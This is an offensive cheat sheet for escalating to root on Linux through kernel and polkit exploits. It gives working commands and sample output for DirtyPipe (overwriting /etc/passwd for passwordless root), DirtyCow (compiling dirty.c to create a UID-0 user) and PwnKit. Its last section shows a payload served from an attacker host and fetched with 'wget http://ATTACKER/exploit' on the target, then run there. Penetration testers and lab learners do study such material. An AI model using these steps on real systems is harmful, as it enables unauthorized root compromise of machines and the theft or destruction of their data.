KERNEL EXPLOITS

Check kernel version

Exact kernel version — Search for matching exploits

uname -r
Example Output
uname -r
4.15.0-20-generic

Search: 'linux kernel 4.15.0-20 exploit'
Results: DirtyCow, various local privesc
(Match exact version to exploits)

linux-exploit-suggester

Automated kernel exploit finder — Suggests matching CVEs

./linux-exploit-suggester.sh
or: ./les.sh
Example Output
./linux-exploit-suggester.sh
[+] CVE-2021-4034 (PwnKit)
  Versions: ALL
  Confidence: Highly probable
[+] CVE-2022-0847 (DirtyPipe)
  Versions: 5.8 - 5.16.11
[+] CVE-2016-5195 (DirtyCow)
  Versions: 2.6.22 - 4.8.3

DirtyPipe (CVE-2022-0847)

Overwrite read-only files — Very reliable

Kernel 5.8 - 5.16.11
Example Output
uname -r: 5.13.0-39-generic (VULNERABLE)

./dirtypipe /etc/passwd 1 '${root::0:0:root:/root:/bin/bash}'

su root (no password)
# whoami
root

DirtyCow (CVE-2016-5195)

Race condition write to read-only — Older but still seen in labs

Kernel 2.6.22 - 4.8.3
Example Output
uname -r: 4.4.0-21-generic (VULNERABLE)

gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword

su firefart
Password: newpassword
# whoami
root (as firefart user with UID 0)

PwnKit (CVE-2021-4034)

Polkit local privesc — Almost always works if pkexec exists

pkexec on most Linux distros
Example Output
which pkexec && pkexec --version
pkexec version 0.105

./PwnKit
# whoami
root
(Works on almost all Linux distros with polkit installed)

Compile on target or cross-compile

Match architecture (x86/x64) — Static compile avoids library issues

gcc exploit.c -o exploit
or compile on attacker: gcc -static -m32 exploit.c -o exploit
Example Output
On target:
gcc exploit.c -o exploit
./exploit

OR cross-compile on attacker:
gcc -static -m64 exploit.c -o exploit
python3 -m http.server 80

On target:
wget http://ATTACKER/exploit
chmod +x exploit && ./exploit